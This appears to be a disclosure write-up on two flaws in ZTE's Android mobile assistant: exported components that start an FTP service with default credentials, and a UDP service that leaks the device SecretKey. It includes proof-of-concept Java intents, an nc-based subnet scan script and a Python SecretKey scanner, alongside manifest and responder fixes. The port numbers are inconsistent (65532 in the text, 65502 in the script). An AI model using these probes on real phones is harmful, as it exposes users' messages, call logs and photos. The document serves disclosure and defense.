ZTE mobile assistant: local elevation of privilege and bypass of the WiFi remote-management authentication mechanism (detailed Android analysis process and ideas)

Source: Internet
Author: User


There are two vulnerabilities:

(1) Exposed components, leading to local elevation of privilege and remote access

(2) Bypass of the remote-management authentication mechanism

ZTE mobile assistant is the official Android smartphone management software of ZTE.


First vulnerability: elevation of privilege through exposed local components. As soon as the user installs the ZTE mobile assistant, a local malicious application holding no permissions at all can start the assistant's FTP service without the user's knowledge, and that FTP service ships with a default username and password, so it can then be accessed remotely.

The two exposed Android components are com.joinme.ftp.FtpServerService and JoinMeServiceReceiver. Either of the following snippets, placed in a test app that requests no permissions, reaches them:

    import android.content.Intent;
    import android.view.View;
    import android.view.View.OnClickListener;
    import android.widget.Button;

    // Inside an Activity of the test app. An implicit Intent carrying only the
    // action string is enough, because the service is exported with a matching filter.
    m_testbutton1 = (Button) findViewById(R.id.BySvc);
    m_testbutton1.setOnClickListener(new OnClickListener() {
        @Override
        public void onClick(View v) {
            Intent i = new Intent();
            i.setAction("com.joinme.ftp.FtpServerService");
            startService(i);   // starts the assistant's FTP service directly
        }
    });


Or
 

    import android.content.Intent;
    import android.view.View;
    import android.view.View.OnClickListener;
    import android.widget.Button;

    // Same effect via the exported JoinMeServiceReceiver: the broadcast action
    // below makes the receiver start the FTP service on our behalf.
    m_testbutton2 = (Button) findViewById(R.id.ByReceiver);
    m_testbutton2.setOnClickListener(new OnClickListener() {
        @Override
        public void onClick(View v) {
            Intent i = new Intent();
            i.setAction("android.intent.action.JoinMe_Ftp_Server_Service_Start");
            sendBroadcast(i);   // no permission is required to send this broadcast
        }
    });



Either one starts the FTP service built into the mobile assistant.

Under normal circumstances, enabling the service requires user intervention: the user has to switch it on manually (see the screenshot of the assistant's service switch).

With the code above the service is enabled without the user's knowledge; the only precondition is that the ZTE mobile assistant is installed on the phone. (On Android 5.0 and later, a calling app that targets API level 21 or higher must start the service with an explicit Intent naming the package and class rather than the action alone; the exported service itself is still reachable.)

The FTP service also ships with a built-in default username and password, and it listens on port 2121. This can be seen in the code snippet of FtpServerService that loads the FTP service settings (screenshot).

Following the Defaults class referenced there gives the default username and password (JoinMe) and the default port (2121) (screenshot).



Second vulnerability: when the mobile assistant is running in the background, its SecretKey leaks, which allows remote control of the phone from any host on the same WiFi network.

We found this second vulnerability while analysing the first one; next to it, the first vulnerability is minor.

The vulnerability is in JoinMeUdpService. This service listens on UDP port 65532 and, on receiving a specific command word, returns sensitive information about the phone, including the SecretKey.

The DoListen method of JoinMeUdpService (screenshot) receives each datagram and hands it to doComm. Stepping into doComm shows that the specific command word is "JoinMe Broadcast" (screenshot).
 

 

Proof of the first vulnerability:

Log in to the FTP service remotely with the default username and password. Directories such as /sdcard can be browsed and their files downloaded; the service does not run as root, so only files readable by the assistant's own user are reachable (screenshot).

Commands supported by the FTP service (screenshot).
 





Proof of the second vulnerability:

Sending "JoinMe Broadcast" to the UDP port returns the phone's information, including the SecretKey (screenshot).

Note that the SecretKey shown above is the verification code the ZTE mobile assistant uses to authorise a PC to manage the phone. As long as the assistant is running in the background, anyone who knows this code can use it on the PC side to fully manage the phone: read all call records, text messages, photos and installed-application information, and exercise every add and delete permission the mobile assistant holds.
 


 





The most damaging scenario is on public WiFi. While a user's mobile assistant is running, the following script scans the subnet for phones that answer with their SecretKey, after which the phone can be controlled from a PC.

scan.sh

    #!/bin/bash
    # Send the "JoinMe Broadcast" command word to every host on the /24 and
    # print whatever the JoinMeUdpService on each phone answers.
    network="192.168.1"
    for address in $(seq 1 254)
    do
        echo ${network}.${address}
        echo -n "JoinMe Broadcast" | nc -w 2 -u ${network}.${address} 65502
    done



Scan results (screenshot).

Remote control of the phone from the PC side (screenshot).

Solution:

For vulnerability 1, set com.joinme.ftp.FtpServerService and JoinMeServiceReceiver to android:exported="false", or protect them with a custom permission whose protectionLevel is signature, so that only applications signed with the same key can start the service. Note that declaring an intent-filter on a component makes it exported by default, which is how both components became reachable in the first place. Do not hard-code the FTP username and password in the code; read them from a configuration file, or let the user set them temporarily from the PC-side assistant when the service is needed.
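As an added illustration of that fix (this is not ZTE's manifest): the component and action names are the ones quoted above, while the package name, the permission name and the receiver's class path are assumed. The service is made private outright; the receiver, which other apps might legitimately need to trigger, keeps its intent-filter but is guarded by a signature-level permission.

```xml
<!-- Added example manifest fragment; package, permission name and receiver path are hypothetical. -->
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.joinme.example">

    <!-- Only APKs signed with this app's signing key can be granted this permission. -->
    <permission
        android:name="com.joinme.example.permission.CONTROL_FTP"
        android:protectionLevel="signature" />

    <application>

        <!-- Option A: the FTP service is only ever started from inside this app,
             so it does not need to be exported at all. exported="false" wins even
             if an intent-filter is present. -->
        <service
            android:name="com.joinme.ftp.FtpServerService"
            android:exported="false" />

        <!-- Option B: the receiver stays reachable, but senders of the start
             broadcast must hold the signature permission declared above. -->
        <receiver
            android:name=".JoinMeServiceReceiver"
            android:exported="true"
            android:permission="com.joinme.example.permission.CONTROL_FTP">
            <intent-filter>
                <action android:name="android.intent.action.JoinMe_Ftp_Server_Service_Start" />
            </intent-filter>
        </receiver>

    </application>
</manifest>
```

With either option in place, the two snippets from the test app above fail: startService() finds no exported service for the action, and the broadcast is not delivered to the receiver because the sender lacks the permission.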

For vulnerability 2, stop echoing the SecretKey in the reply to the UDP command; a discovery reply, if one is needed at all, must not carry the credential that authorises management of the phone.
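The UDP exchange behind vulnerability 2 and the fix just described, as an added example that is not code from the write-up or from ZTE. It models both sides on loopback: a "phone" responder that answers the "JoinMe Broadcast" command word with device information including a SecretKey, a hardened responder that never includes the key, and the attacker-side probe and subnet scan that scan.sh performs with nc. The command word is the one recovered from doComm; the reply layout (key=value lines), the SecretKey value, the loopback addresses and the hardened variant are constructed for this example. The port is a parameter because the write-up quotes both 65532 and 65502.

```python
import socket
import threading
from typing import Callable, Dict, Iterable, Optional

# Command word from doComm (taken from the write-up). The reply layout, the
# SecretKey value and the hardened responder below are constructed for this
# example and are not taken from the real JoinMeUdpService.
COMMAND = b"JoinMe Broadcast"
SECRET_KEY = "1a2b3c4d"  # constructed sample value, not a real key

Handler = Callable[[bytes], Optional[bytes]]


def vulnerable_handler(data: bytes) -> Optional[bytes]:
    """Phone side as described: the command word is answered with device info that includes the SecretKey."""
    if data.strip() == COMMAND:
        return ("Model=ZTE-sample\nSecretKey=%s\n" % SECRET_KEY).encode()
    return None  # anything else is ignored, so a plain port scan learns nothing


def hardened_handler(data: bytes) -> Optional[bytes]:
    """Fix for vulnerability 2: discovery may still answer, but the key never leaves the phone."""
    if data.strip() == COMMAND:
        return b"Model=ZTE-sample\n"
    return None


def serve(handler: Handler, host: str = "127.0.0.1"):
    """Run a UDP responder on an ephemeral loopback port in a daemon thread.

    Returns (port, stop_event); set the event to shut the responder down.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((host, 0))
    sock.settimeout(0.2)
    port = sock.getsockname()[1]
    stop = threading.Event()

    def loop() -> None:
        while not stop.is_set():
            try:
                data, addr = sock.recvfrom(4096)
            except socket.timeout:
                continue
            reply = handler(data)
            if reply is not None:
                sock.sendto(reply, addr)
        sock.close()

    threading.Thread(target=loop, daemon=True).start()
    return port, stop


def probe(host: str, port: int, timeout: float = 1.0) -> Optional[str]:
    """Attacker side: send the command word once; return the reply text, or None if the host stays silent."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(COMMAND, (host, port))
        try:
            data, _ = s.recvfrom(4096)
        except OSError:  # timeout, or ICMP port-unreachable surfacing as ECONNREFUSED
            return None
    return data.decode(errors="replace")


def extract_secret_key(reply: Optional[str]) -> Optional[str]:
    """Pull the SecretKey field out of a key=value reply, if one is present."""
    if not reply:
        return None
    for line in reply.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip() == "SecretKey":
            return value.strip()
    return None


def scan(hosts: Iterable[str], port: int, timeout: float = 0.5) -> Dict[str, str]:
    """The scan.sh loop with parsing added: map each host that leaks a SecretKey to that key."""
    leaks: Dict[str, str] = {}
    for host in hosts:
        key = extract_secret_key(probe(host, port, timeout))
        if key is not None:
            leaks[host] = key
    return leaks


def demo():
    """Stand up both responders on loopback and scan each; returns (leaking, hardened) scan results."""
    vuln_port, stop_vuln = serve(vulnerable_handler)
    safe_port, stop_safe = serve(hardened_handler)
    try:
        leaking = scan(["127.0.0.1"], vuln_port)
        hardened = scan(["127.0.0.1"], safe_port)
    finally:
        stop_vuln.set()
        stop_safe.set()
    return leaking, hardened


if __name__ == "__main__":
    print(demo())
```

Against a real network, scan() would be called with the 254 addresses of the /24 and the port the service actually binds; the hardened responder shows why the fix is to remove the credential from the reply rather than to hide the port, since the command word is recoverable from the APK by anyone.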
